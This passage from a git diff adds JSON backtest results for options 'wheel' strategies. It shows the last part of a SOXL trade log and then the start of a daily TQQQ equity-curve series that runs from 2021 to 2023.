"premium": 1.7065030921571154, + "close_cost": 0.32508733973026693, + "pnl": 132.16157524268485, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-11-21 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 36.53, + "spot": 31.729999542236328, + "premium": 1.4909936546921951, + "close_cost": 4.800000457763673, + "pnl": -333.8906803071478, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-11-28 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 32.36, + "spot": 41.2599983215332, + "premium": 1.9730459964077944, + "close_cost": 8.899998321533204, + "pnl": -695.6852325125409, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.78, + "spot": 43.79999923706055, + "premium": 1.997907678088092, + "close_cost": 0.48932665095884875, + "pnl": 144.87810271292435, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.71, + "spot": 47.9900016784668, + "premium": 1.9298796524424837, + "close_cost": 0.8409541270987031, + "pnl": 102.91255253437807, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-12-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.21, + "spot": 41.720001220703125, + "premium": 1.7285131204335258, + "close_cost": 0.0, + "pnl": 166.8713120433526, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-12-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.22, + "spot": 43.2599983215332, + "premium": 1.5638381640552996, + "close_cost": 0.6177045366874125, + "pnl": 88.6333627367887, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-01-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.56, + "spot": 47.2400016784668, + "premium": 1.3394532653801914, + "close_cost": 0.0, + "pnl": 127.96532653801914, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2026-01-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 44.41, + "spot": 49.220001220703125, + "premium": 1.5735082233842625, + "close_cost": 0.5410491967564326, + "pnl": 97.26590266278299, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 58.08, + "spot": 65.19999694824219, + "premium": 2.164974703678226, + "close_cost": 0.5135438507519865, + "pnl": 159.16308529262395, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 58.04, + "spot": 64.02999877929688, + "premium": 2.7087783739713664, + "close_cost": 1.0897630939206966, + "pnl": 155.921528005067, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 60.71, + "spot": 66.29000091552734, + "premium": 2.927074499873921, + "close_cost": 0.6119758055986182, + "pnl": 225.52986942753031, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2026-02-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 63.08, + "spot": 68.52999877929688, + "premium": 2.800487140391457, + "close_cost": 1.0319373841051842, + "pnl": 170.8749756286273, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-03-06 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 59.0, + "spot": 47.88999938964844, + "premium": 2.659514489704925, + "close_cost": 11.110000610351562, + "pnl": -848.0386120646638, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2026-03-13 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 48.85, + "spot": 50.720001220703125, + "premium": 3.0335473413147938, + "close_cost": 1.8700012207031236, + "pnl": 113.36461206116702, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2026-03-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.68, + "spot": 53.689998626708984, + "premium": 1.963276329563726, + "close_cost": 0.6245221532337855, + "pnl": 127.89541763299407, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.07, + "spot": 53.029998779296875, + "premium": 2.078310585945001, + "close_cost": 0.8762885372215123, + "pnl": 114.22220487234887, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.81, + "spot": 47.90999984741211, + "premium": 2.0830275418858815, + "close_cost": 0.9621069013469548, + "pnl": 106.11206405389267, + "hold_days": 4, + "result": "Win" + } + ], + "underlying_ticker": "SOXL", + "signal_ticker": "SOXX" + }, + "_updated_at": "2026-04-24 16:37:03" +} \ No newline at end of file diff --git a/data/dashboard/wheel/tqqq_wheel_aggressive_latest.json b/data/dashboard/wheel/tqqq_wheel_aggressive_latest.json new file mode 100644 index 0000000..0c1da43 --- /dev/null +++ b/data/dashboard/wheel/tqqq_wheel_aggressive_latest.json @@ -0,0 +1,32406 @@ +{ + "style": "aggressive", + "result_payload": { + "equity": [ + [ + "2021-04-26", + 9998.183037138344 + ], + [ + "2021-04-27", + 9996.393335929548 + ], + [ + "2021-04-28", + 9996.650984101701 + ], + [ + "2021-04-29", + 10012.279067433305 + ], + [ + "2021-04-30", + 10008.431656953162 + ], + [ + "2021-05-03", + 10036.722399731885 + ], + [ + "2021-05-04", + 9999.264962217836 + ], + [ + "2021-05-05", + 9994.518133659587 + ], + [ + "2021-05-06", + 10026.858512304307 + ], + [ + "2021-05-07", + 10055.166517547457 + ], + [ + "2021-05-10", + 9991.842191151842 + ], + [ + "2021-05-11", + 9992.658276186155 + ], + [ + "2021-05-12", + 9862.470678072923 + ], + [ + "2021-05-13", + 9892.530119205883 + ], + [ + "2021-05-14", + 9946.34968432203 + ], + [ + "2021-05-17", + 9958.801422158806 + ], + [ + "2021-05-18", + 9959.854817256008 + ], + [ + "2021-05-19", + 9969.006054945357 + ], + [ + "2021-05-20", + 9991.035005218499 + ], + [ + "2021-05-21", + 9992.20699072966 + ], + [ + "2021-05-24", + 9993.379113719076 + ], + [ + "2021-05-25", + 9994.55137420287 + ], + [ + "2021-05-26", + 9992.733772197174 + ], + [ + "2021-05-27", + 9992.244925657757 + ], + [ + "2021-05-28", + 10005.201121829492 + ], + [ + "2021-06-01", + 10025.827957587948 + ], + [ + "2021-06-02", + 10027.004024441638 + ], + [ + "2021-06-03", + 10025.190229252337 + ], + [ + "2021-06-04", + 10044.647473143086 + ], + [ + "2021-06-07", + 10045.825747595843 + ], + [ + "2021-06-08", + 10047.00416026457 + ], + [ + "2021-06-09", + 10048.18271116548 + ], + [ + "2021-06-10", + 10049.361400314787 + ], + [ + "2021-06-11", + 10050.540227728708 + ], + [ + "2021-06-14", + 10051.719193423463 + ], + [ + "2021-06-15", + 10052.898297415273 + ], + [ + "2021-06-16", + 10054.07753972036 + ], + [ + "2021-06-17", + 10055.256920354948 + ], + [ + "2021-06-18", + 10056.436439335266 + ], + [ + "2021-06-21", + 10057.61609667754 + ], + [ + "2021-06-22", + 10058.795892398002 + ], + [ + "2021-06-23", + 10059.975826512884 + ], + [ + "2021-06-24", + 10061.155899038418 + ], + [ + "2021-06-25", + 10062.336109990843 + ], + [ + "2021-06-28", + 10063.516459386396 + ], + [ + "2021-06-29", + 10064.696947241317 + ], + [ + "2021-06-30", + 10065.877573571846 + ], + [ + "2021-07-01", + 10067.058338394228 + ], + [ + "2021-07-02", + 10068.23924172471 + ], + [ + "2021-07-06", + 10069.420283579539 + ], + [ + "2021-07-07", + 10070.601463974963 + ], + [ + "2021-07-08", + 10071.782782927234 + ], + [ + "2021-07-09", + 10072.964240452606 + ], + [ + "2021-07-12", + 10074.145836567332 + ], + [ + "2021-07-13", + 10075.327571287671 + ], + [ + "2021-07-14", + 10076.509444629883 + ], + [ + "2021-07-15", + 10077.691456610226 + ], + [ + "2021-07-16", + 10078.873607244965 + ], + [ + "2021-07-19", + 10080.055896550362 + ], + [ + "2021-07-20", + 10081.238324542686 + ], + [ + "2021-07-21", + 10082.420891238206 + ], + [ + "2021-07-22", + 10083.603596653189 + ], + [ + "2021-07-23", + 10084.786440803911 + ], + [ + "2021-07-26", + 10085.969423706645 + ], + [ + "2021-07-27", + 10087.152545377667 + ], + [ + "2021-07-28", + 10088.335805833254 + ], + [ + "2021-07-29", + 10089.519205089688 + ], + [ + "2021-07-30", + 10090.702743163249 + ], + [ + "2021-08-02", + 10091.886420070221 + ], + [ + "2021-08-03", + 10093.07023582689 + ], + [ + "2021-08-04", + 10094.254190449545 + ], + [ + "2021-08-05", + 10095.438283954474 + ], + [ + "2021-08-06", + 10096.62251635797 + ], + [ + "2021-08-09", + 10097.806887676323 + ], + [ + "2021-08-10", + 10098.99139792583 + ], + [ + "2021-08-11", + 10100.17604712279 + ], + [ + "2021-08-12", + 10101.3608352835 + ], + [ + "2021-08-13", + 10102.54576242426 + ], + [ + "2021-08-16", + 10103.730828561376 + ], + [ + "2021-08-17", + 10104.91603371115 + ], + [ + "2021-08-18", + 10106.101377889889 + ], + [ + "2021-08-19", + 10107.286861113902 + ], + [ + "2021-08-20", + 10108.4724833995 + ], + [ + "2021-08-23", + 10109.658244762997 + ], + [ + "2021-08-24", + 10110.844145220704 + ], + [ + "2021-08-25", + 10112.03018478894 + ], + [ + "2021-08-26", + 10113.216363484022 + ], + [ + "2021-08-27", + 10114.40268132227 + ], + [ + "2021-08-30", + 10115.589138320007 + ], + [ + "2021-08-31", + 10116.775734493554 + ], + [ + "2021-09-01", + 10117.962469859242 + ], + [ + "2021-09-02", + 10119.149344433394 + ], + [ + "2021-09-03", + 10120.336358232342 + ], + [ + "2021-09-07", + 10121.523511272417 + ], + [ + "2021-09-08", + 10122.710803569951 + ], + [ + "2021-09-09", + 10123.898235141281 + ], + [ + "2021-09-10", + 10125.085806002746 + ], + [ + "2021-09-13", + 10126.273516170682 + ], + [ + "2021-09-14", + 10127.461365661433 + ], + [ + "2021-09-15", + 10128.64935449134 + ], + [ + "2021-09-16", + 10129.837482676749 + ], + [ + "2021-09-17", + 10131.025750234006 + ], + [ + "2021-09-20", + 10129.224157179462 + ], + [ + "2021-09-21", + 10137.412589838526 + ], + [ + "2021-09-22", + 10141.509090758916 + ], + [ + "2021-09-23", + 10142.698727439149 + ], + [ + "2021-09-24", + 10143.88850366818 + ], + [ + "2021-09-27", + 10142.088419462383 + ], + [ + "2021-09-28", + 10033.507609970486 + ], + [ + "2021-09-29", + 10027.395876441207 + ], + [ + "2021-09-30", + 10009.629330448915 + ], + [ + "2021-10-01", + 10056.730712805556 + ], + [ + "2021-10-04", + 9894.260835562469 + ], + [ + "2021-10-05", + 9949.777614326953 + ], + [ + "2021-10-06", + 9975.702492288385 + ], + [ + "2021-10-07", + 9998.890789343814 + ], + [ + "2021-10-08", + 9998.825899556905 + ], + [ + "2021-10-11", + 10014.227930376059 + ], + [ + "2021-10-12", + 10014.027952279483 + ], + [ + "2021-10-13", + 10030.590613909753 + ], + [ + "2021-10-14", + 10031.767239440718 + ], + [ + "2021-10-15", + 10032.944002994227 + ], + [ + "2021-10-18", + 10031.130904586471 + ], + [ + "2021-10-19", + 10050.101914308116 + ], + [ + "2021-10-20", + 10052.597071367705 + ], + [ + "2021-10-21", + 10053.776278337858 + ], + [ + "2021-10-22", + 10054.955623633368 + ], + [ + "2021-10-25", + 10053.145107270462 + ], + [ + "2021-10-26", + 10076.606928453772 + ], + [ + "2021-10-27", + 10077.78895186933 + ], + [ + "2021-10-28", + 10078.971113940624 + ], + [ + "2021-10-29", + 10080.15341468392 + ], + [ + "2021-11-01", + 10081.335854115483 + ], + [ + "2021-11-02", + 10082.518432251583 + ], + [ + "2021-11-03", + 10083.70114910849 + ], + [ + "2021-11-04", + 10084.884004702477 + ], + [ + "2021-11-05", + 10086.066999049817 + ], + [ + "2021-11-08", + 10087.25013216679 + ], + [ + "2021-11-09", + 10088.43340406967 + ], + [ + "2021-11-10", + 10086.62681477474 + ], + [ + "2021-11-11", + 10094.75404131205 + ], + [ + "2021-11-12", + 10095.93819345134 + ], + [ + "2021-11-15", + 10097.122484496076 + ], + [ + "2021-11-16", + 10098.30691446255 + ], + [ + "2021-11-17", + 10099.491483367055 + ], + [ + "2021-11-18", + 10100.676191225893 + ], + [ + "2021-11-19", + 10101.861038055364 + ], + [ + "2021-11-22", + 10100.056023871768 + ], + [ + "2021-11-23", + 10095.74131088797 + ], + [ + "2021-11-24", + 10106.077061994063 + ], + [ + "2021-11-26", + 10054.751955214762 + ], + [ + "2021-11-29", + 10112.81926076265 + ], + [ + "2021-11-30", + 10066.521086159186 + ], + [ + "2021-12-01", + 9964.07840057923 + ], + [ + "2021-12-02", + 10021.111434495022 + ], + [ + "2021-12-03", + 9888.737588535727 + ], + [ + "2021-12-06", + 9979.976346542717 + ], + [ + "2021-12-07", + 10095.232842466137 + ], + [ + "2021-12-08", + 10115.876202220083 + ], + [ + "2021-12-09", + 10088.57102165182 + ], + [ + "2021-12-10", + 10126.663676347333 + ], + [ + "2021-12-13", + 10145.753288671964 + ], + [ + "2021-12-14", + 10121.071061577515 + ], + [ + "2021-12-15", + 10180.48006669009 + ], + [ + "2021-12-16", + 10181.67427481053 + ], + [ + "2021-12-17", + 10182.868623016018 + ], + [ + "2021-12-20", + 10181.073111322987 + ], + [ + "2021-12-21", + 10226.474168994831 + ], + [ + "2021-12-22", + 10227.673772394286 + ], + [ + "2021-12-23", + 10228.873516511676 + ], + [ + "2021-12-27", + 10227.083401363505 + ], + [ + "2021-12-28", + 10232.795281447976 + ], + [ + "2021-12-29", + 10249.019879543757 + ], + [ + "2021-12-30", + 10257.87625940994 + ], + [ + "2021-12-31", + 10249.572303958152 + ], + [ + "2022-01-03", + 10323.803615570263 + ], + [ + "2022-01-04", + 10281.387910921365 + ], + [ + "2022-01-05", + 10085.000153547773 + ], + [ + "2022-01-06", + 10088.818311886816 + ], + [ + "2022-01-07", + 9996.345941071884 + ], + [ + "2022-01-10", + 10013.300314359753 + ], + [ + "2022-01-11", + 10094.967988898914 + ], + [ + "2022-01-12", + 10123.851707680049 + ], + [ + "2022-01-13", + 10006.518503905534 + ], + [ + "2022-01-14", + 10060.970220509564 + ], + [ + "2022-01-18", + 9861.44032549656 + ], + [ + "2022-01-19", + 9802.55714170989 + ], + [ + "2022-01-20", + 9718.53916371304 + ], + [ + "2022-01-21", + 9538.7120185556 + ], + [ + "2022-01-24", + 9589.12242665832 + ], + [ + "2022-01-25", + 9451.505510383437 + ], + [ + "2022-01-26", + 9456.648396612527 + ], + [ + "2022-01-27", + 9416.835962997746 + ], + [ + "2022-01-28", + 9529.65058207408 + ], + [ + "2022-01-31", + 9584.941427245181 + ], + [ + "2022-02-01", + 9583.262873014506 + ], + [ + "2022-02-02", + 9612.477490685225 + ], + [ + "2022-02-03", + 9468.24699759447 + ], + [ + "2022-02-04", + 9533.940254613028 + ], + [ + "2022-02-07", + 9555.787433804768 + ], + [ + "2022-02-08", + 9666.32200762185 + ], + [ + "2022-02-09", + 9713.591596970999 + ], + [ + "2022-02-10", + 9714.731037339994 + ], + [ + "2022-02-11", + 9715.870611369577 + ], + [ + "2022-02-14", + 9717.010319075425 + ], + [ + "2022-02-15", + 9715.16016047322 + ], + [ + "2022-02-16", + 9728.30150809374 + ], + [ + "2022-02-17", + 9633.081747895347 + ], + [ + "2022-02-18", + 9599.05529429155 + ], + [ + "2022-02-22", + 9576.339838632133 + ], + [ + "2022-02-23", + 9475.98782255799 + ], + [ + "2022-02-24", + 9608.758745269417 + ], + [ + "2022-02-25", + 9670.24701553657 + ], + [ + "2022-02-28", + 9736.28322803642 + ], + [ + "2022-03-01", + 9748.25380949023 + ], + [ + "2022-03-02", + 9810.235599614074 + ], + [ + "2022-03-03", + 9775.549185843993 + ], + [ + "2022-03-04", + 9735.807316537308 + ], + [ + "2022-03-07", + 9520.456589434496 + ], + [ + "2022-03-08", + 9515.21964531709 + ], + [ + "2022-03-09", + 9608.111631226013 + ], + [ + "2022-03-10", + 9600.735343049639 + ], + [ + "2022-03-11", + 9552.68681326528 + ], + [ + "2022-03-14", + 9487.99467002336 + ], + [ + "2022-03-15", + 9561.29698619133 + ], + [ + "2022-03-16", + 9610.222456113894 + ], + [ + "2022-03-17", + 9621.66959312182 + ], + [ + "2022-03-18", + 9628.931000336575 + ], + [ + "2022-03-21", + 9627.98217928304 + ], + [ + "2022-03-22", + 9677.508487149737 + ], + [ + "2022-03-23", + 9666.534619217882 + ], + [ + "2022-03-24", + 9708.647281943548 + ], + [ + "2022-03-25", + 9709.786142326027 + ], + [ + "2022-03-28", + 9707.935136301061 + ], + [ + "2022-03-29", + 9759.461072052198 + ], + [ + "2022-03-30", + 9751.411132906162 + ], + [ + "2022-03-31", + 9730.909099074768 + ], + [ + "2022-04-01", + 9746.223410729028 + ], + [ + "2022-04-04", + 9811.403060545254 + ], + [ + "2022-04-05", + 9740.2388379163 + ], + [ + "2022-04-06", + 9648.41751431126 + ], + [ + "2022-04-07", + 9674.00676373896 + ], + [ + "2022-04-08", + 9602.436304143896 + ], + [ + "2022-04-11", + 9437.669680893416 + ], + [ + "2022-04-12", + 9438.571502712774 + ], + [ + "2022-04-13", + 9524.198237920746 + ], + [ + "2022-04-14", + 9448.329645669952 + ], + [ + "2022-04-18", + 9496.21600877591 + ], + [ + "2022-04-19", + 9563.359234170981 + ], + [ + "2022-04-20", + 9531.78373783242 + ], + [ + "2022-04-21", + 9458.910914992066 + ], + [ + "2022-04-22", + 9312.410333842521 + ], + [ + "2022-04-25", + 9371.27424369671 + ], + [ + "2022-04-26", + 9222.040315196315 + ], + [ + "2022-04-27", + 9230.129937276422 + ], + [ + "2022-04-28", + 9302.222402281697 + ], + [ + "2022-04-29", + 9185.672815485912 + ], + [ + "2022-05-02", + 9279.284566702905 + ], + [ + "2022-05-03", + 9309.409532574316 + ], + [ + "2022-05-04", + 9383.685909508009 + ], + [ + "2022-05-05", + 9242.058444271472 + ], + [ + "2022-05-06", + 9208.237525003675 + ], + [ + "2022-05-09", + 9033.56758721728 + ], + [ + "2022-05-10", + 9066.160403135873 + ], + [ + "2022-05-11", + 9001.587190696064 + ], + [ + "2022-05-12", + 9005.898206435637 + ], + [ + "2022-05-13", + 9097.166838809695 + ], + [ + "2022-05-16", + 9137.489596754796 + ], + [ + "2022-05-17", + 9193.435480438784 + ], + [ + "2022-05-18", + 9080.04177495244 + ], + [ + "2022-05-19", + 9070.524555243173 + ], + [ + "2022-05-20", + 9065.660791646642 + ], + [ + "2022-05-23", + 9122.822491493893 + ], + [ + "2022-05-24", + 9095.980280197704 + ], + [ + "2022-05-25", + 9136.459699948877 + ], + [ + "2022-05-26", + 9187.339131188646 + ], + [ + "2022-05-27", + 9193.347234558105 + ], + [ + "2022-05-31", + 9231.587626119499 + ], + [ + "2022-06-01", + 9233.93757417077 + ], + [ + "2022-06-02", + 9272.343251453878 + ], + [ + "2022-06-03", + 9270.44093175322 + ], + [ + "2022-06-06", + 9302.121792261532 + ], + [ + "2022-06-07", + 9321.670854032203 + ], + [ + "2022-06-08", + 9322.764320642524 + ], + [ + "2022-06-09", + 9323.857915520539 + ], + [ + "2022-06-10", + 9321.961638681294 + ], + [ + "2022-06-13", + 9252.799606400305 + ], + [ + "2022-06-14", + 9265.949439669366 + ], + [ + "2022-06-15", + 9327.313260374262 + ], + [ + "2022-06-16", + 9223.060289741257 + ], + [ + "2022-06-17", + 9260.245802898418 + ], + [ + "2022-06-21", + 9320.874600653127 + ], + [ + "2022-06-22", + 9330.229308789738 + ], + [ + "2022-06-23", + 9349.651802375429 + ], + [ + "2022-06-24", + 9351.149818017822 + ], + [ + "2022-06-27", + 9365.988747703921 + ], + [ + "2022-06-28", + 9317.266499480915 + ], + [ + "2022-06-29", + 9329.120946150526 + ], + [ + "2022-06-30", + 9305.52529801883 + ], + [ + "2022-07-01", + 9325.680148877284 + ], + [ + "2022-07-05", + 9382.315087641971 + ], + [ + "2022-07-06", + 9400.25256076454 + ], + [ + "2022-07-07", + 9420.739086673148 + ], + [ + "2022-07-08", + 9420.621761572502 + ], + [ + "2022-07-11", + 9410.026123982547 + ], + [ + "2022-07-12", + 9403.34207501903 + ], + [ + "2022-07-13", + 9413.682299596328 + ], + [ + "2022-07-14", + 9432.890776548495 + ], + [ + "2022-07-15", + 9476.892330758728 + ], + [ + "2022-07-18", + 9490.982046125098 + ], + [ + "2022-07-19", + 9510.690411784002 + ], + [ + "2022-07-20", + 9511.806051090434 + ], + [ + "2022-07-21", + 9512.9218212655 + ], + [ + "2022-07-22", + 9511.04772232455 + ], + [ + "2022-07-25", + 9525.682928976103 + ], + [ + "2022-07-26", + 9496.608964872568 + ], + [ + "2022-07-27", + 9544.62674240644 + ], + [ + "2022-07-28", + 9545.74636257049 + ], + [ + "2022-07-29", + 9543.87611407014 + ], + [ + "2022-08-01", + 9560.257758256374 + ], + [ + "2022-08-02", + 9564.406057546448 + ], + [ + "2022-08-03", + 9581.65259608739 + ], + [ + "2022-08-04", + 9582.776559521582 + ], + [ + "2022-08-05", + 9583.90065480086 + ], + [ + "2022-08-08", + 9582.034881940688 + ], + [ + "2022-08-09", + 9569.15631417425 + ], + [ + "2022-08-10", + 9604.492650653458 + ], + [ + "2022-08-11", + 9605.619293310874 + ], + [ + "2022-08-12", + 9606.746068127659 + ], + [ + "2022-08-15", + 9607.872975119315 + ], + [ + "2022-08-16", + 9609.000014301346 + ], + [ + "2022-08-17", + 9607.137185689258 + ], + [ + "2022-08-18", + 9617.53741602836 + ], + [ + "2022-08-19", + 9588.3496833481 + ], + [ + "2022-08-22", + 9524.950297438636 + ], + [ + "2022-08-23", + 9527.841874347894 + ], + [ + "2022-08-24", + 9539.562405344383 + ], + [ + "2022-08-25", + 9581.178114404664 + ], + [ + "2022-08-26", + 9460.753594933263 + ], + [ + "2022-08-29", + 9426.02842011591 + ], + [ + "2022-08-30", + 9403.81999888883 + ], + [ + "2022-08-31", + 9396.436052817266 + ], + [ + "2022-09-01", + 9403.038228155012 + ], + [ + "2022-09-02", + 9353.889495881505 + ], + [ + "2022-09-06", + 9356.713592570684 + ], + [ + "2022-09-07", + 9404.164204365636 + ], + [ + "2022-09-08", + 9423.419649928472 + ], + [ + "2022-09-09", + 9429.394985993136 + ], + [ + "2022-09-12", + 9451.17732181712 + ], + [ + "2022-09-13", + 9452.285980017077 + ], + [ + "2022-09-14", + 9453.394768266759 + ], + [ + "2022-09-15", + 9454.50368658142 + ], + [ + "2022-09-16", + 9452.622734976318 + ], + [ + "2022-09-19", + 9471.68170913089 + ], + [ + "2022-09-20", + 9472.792772571629 + ], + [ + "2022-09-21", + 9473.903966344236 + ], + [ + "2022-09-22", + 9475.015290464 + ], + [ + "2022-09-23", + 9473.136744946209 + ], + [ + "2022-09-26", + 9485.397914465544 + ], + [ + "2022-09-27", + 9487.999733513328 + ], + [ + "2022-09-28", + 9489.11271111893 + ], + [ + "2022-09-29", + 9490.225819280939 + ], + [ + "2022-09-30", + 9488.349058014668 + ], + [ + "2022-10-03", + 9506.918565688416 + ], + [ + "2022-10-04", + 9508.033762543293 + ], + [ + "2022-10-05", + 9509.149090214903 + ], + [ + "2022-10-06", + 9510.264548718591 + ], + [ + "2022-10-07", + 9508.390138069704 + ], + [ + "2022-10-10", + 9513.201503491173 + ], + [ + "2022-10-11", + 9509.433795592864 + ], + [ + "2022-10-12", + 9515.093934648674 + ], + [ + "2022-10-13", + 9538.824819542726 + ], + [ + "2022-10-14", + 9536.953759119675 + ], + [ + "2022-10-17", + 9555.746116452123 + ], + [ + "2022-10-18", + 9556.867040960042 + ], + [ + "2022-10-19", + 9557.98809695657 + ], + [ + "2022-10-20", + 9559.109284457129 + ], + [ + "2022-10-21", + 9557.240603477145 + ], + [ + "2022-10-24", + 9575.71045197284 + ], + [ + "2022-10-25", + 9576.83371837146 + ], + [ + "2022-10-26", + 9577.9571165334 + ], + [ + "2022-10-27", + 9579.080646474116 + ], + [ + "2022-10-28", + 9577.214308209068 + ], + [ + "2022-10-31", + 9581.286261438203 + ], + [ + "2022-11-01", + 9577.128141296418 + ], + [ + "2022-11-02", + 9510.428139167221 + ], + [ + "2022-11-03", + 9464.664110352722 + ], + [ + "2022-11-04", + 9500.966143161675 + ], + [ + "2022-11-07", + 9528.060368805469 + ], + [ + "2022-11-08", + 9542.310001979613 + ], + [ + "2022-11-09", + 9517.245274063183 + ], + [ + "2022-11-10", + 9566.330747247388 + ], + [ + "2022-11-11", + 9564.849257624688 + ], + [ + "2022-11-14", + 9575.736595133798 + ], + [ + "2022-11-15", + 9594.051565179458 + ], + [ + "2022-11-16", + 9595.176983058773 + ], + [ + "2022-11-17", + 9596.302532953785 + ], + [ + "2022-11-18", + 9594.43821487998 + ], + [ + "2022-11-21", + 9601.292348498597 + ], + [ + "2022-11-22", + 9620.071870809154 + ], + [ + "2022-11-23", + 9621.200340966954 + ], + [ + "2022-11-25", + 9619.338943498495 + ], + [ + "2022-11-28", + 9621.245265233443 + ], + [ + "2022-11-29", + 9618.155650413406 + ], + [ + "2022-11-30", + 9658.085415687541 + ], + [ + "2022-12-01", + 9659.218344975332 + ], + [ + "2022-12-02", + 9657.361407159935 + ], + [ + "2022-12-05", + 9652.8540363816 + ], + [ + "2022-12-06", + 9622.537101793492 + ], + [ + "2022-12-07", + 9622.27588758778 + ], + [ + "2022-12-08", + 9658.348411899711 + ], + [ + "2022-12-09", + 9649.71420882939 + ], + [ + "2022-12-12", + 9680.721494169244 + ], + [ + "2022-12-13", + 9696.851764813628 + ], + [ + "2022-12-14", + 9695.758665363155 + ], + [ + "2022-12-15", + 9624.942109974612 + ], + [ + "2022-12-16", + 9612.639609865599 + ], + [ + "2022-12-19", + 9588.587950291014 + ], + [ + "2022-12-20", + 9591.002866562872 + ], + [ + "2022-12-21", + 9613.874025148456 + ], + [ + "2022-12-22", + 9582.467907349597 + ], + [ + "2022-12-23", + 9588.960038449975 + ], + [ + "2022-12-27", + 9559.888109649502 + ], + [ + "2022-12-28", + 9543.874658096458 + ], + [ + "2022-12-29", + 9584.969586996189 + ], + [ + "2022-12-30", + 9589.298158579837 + ], + [ + "2023-01-03", + 9595.659442302218 + ], + [ + "2023-01-04", + 9606.133669539191 + ], + [ + "2023-01-05", + 9587.137904486215 + ], + [ + "2023-01-06", + 9621.949418336204 + ], + [ + "2023-01-09", + 9641.002925503124 + ], + [ + "2023-01-10", + 9645.221051172848 + ], + [ + "2023-01-11", + 9646.352471422904 + ], + [ + "2023-01-12", + 9647.484024392757 + ], + [ + "2023-01-13", + 9648.615710097978 + ], + [ + "2023-01-17", + 9649.747528554133 + ], + [ + "2023-01-18", + 9650.879479776797 + ], + [ + "2023-01-19", + 9652.011563781543 + ], + [ + "2023-01-20", + 9653.143780583949 + ], + [ + "2023-01-23", + 9654.276130199589 + ], + [ + "2023-01-24", + 9655.408612644045 + ], + [ + "2023-01-25", + 9656.541227932898 + ], + [ + "2023-01-26", + 9657.673976081729 + ], + [ + "2023-01-27", + 9658.806857106125 + ], + [ + "2023-01-30", + 9659.939871021674 + ], + [ + "2023-01-31", + 9661.073017843963 + ], + [ + "2023-02-01", + 9662.206297588582 + ], + [ + "2023-02-02", + 9663.339710271124 + ], + [ + "2023-02-03", + 9664.473255907184 + ], + [ + "2023-02-06", + 9665.606934512356 + ], + [ + "2023-02-07", + 9666.740746102238 + ], + [ + "2023-02-08", + 9664.88469069243 + ], + [ + "2023-02-09", + 9659.307321624907 + ], + [ + "2023-02-10", + 9654.953348823099 + ], + [ + "2023-02-13", + 9685.588379683304 + ], + [ + "2023-02-14", + 9686.724535170913 + ], + [ + "2023-02-15", + 9684.870823933781 + ], + [ + "2023-02-16", + 9661.901094265288 + ], + [ + "2023-02-17", + 9656.907633802957 + ], + [ + "2023-02-21", + 9614.480635635426 + ], + [ + "2023-02-22", + 9614.064174599813 + ], + [ + "2023-02-23", + 9632.350868501608 + ], + [ + "2023-02-24", + 9607.268196642583 + ], + [ + "2023-02-27", + 9638.442818324183 + ], + [ + "2023-02-28", + 9638.085995393156 + ], + [ + "2023-03-01", + 9628.328757378453 + ], + [ + "2023-03-02", + 9650.195024424202 + ], + [ + "2023-03-03", + 9687.50298473557 + ], + [ + "2023-03-06", + 9703.043103346907 + ], + [ + "2023-03-07", + 9700.758789826858 + ], + [ + "2023-03-08", + 9715.932186192591 + ], + [ + "2023-03-09", + 9682.73889834909 + ], + [ + "2023-03-10", + 9642.657809664175 + ], + [ + "2023-03-13", + 9663.955723299401 + ], + [ + "2023-03-14", + 9687.88506985661 + ], + [ + "2023-03-15", + 9692.762780610683 + ], + [ + "2023-03-16", + 9695.282909812968 + ], + [ + "2023-03-17", + 9696.384900623645 + ], + [ + "2023-03-20", + 9697.522322583256 + ], + [ + "2023-03-21", + 9698.659877966687 + ], + [ + "2023-03-22", + 9699.79756678959 + ], + [ + "2023-03-23", + 9700.935389067618 + ], + [ + "2023-03-24", + 9702.073344816423 + ], + [ + "2023-03-27", + 9703.211434051664 + ], + [ + "2023-03-28", + 9704.349656789 + ], + [ + "2023-03-29", + 9705.488013044089 + ], + [ + "2023-03-30", + 9706.626502832594 + ], + [ + "2023-03-31", + 9707.765126170181 + ], + [ + "2023-04-03", + 9708.903883072513 + ], + [ + "2023-04-04", + 9710.042773555258 + ], + [ + "2023-04-05", + 9711.181797634088 + ], + [ + "2023-04-06", + 9712.320955324672 + ], + [ + "2023-04-10", + 9713.460246642684 + ], + [ + "2023-04-11", + 9714.599671603799 + ], + [ + "2023-04-12", + 9715.739230223693 + ], + [ + "2023-04-13", + 9716.878922518046 + ], + [ + "2023-04-14", + 9718.018748502538 + ], + [ + "2023-04-17", + 9719.15870819285 + ], + [ + "2023-04-18", + 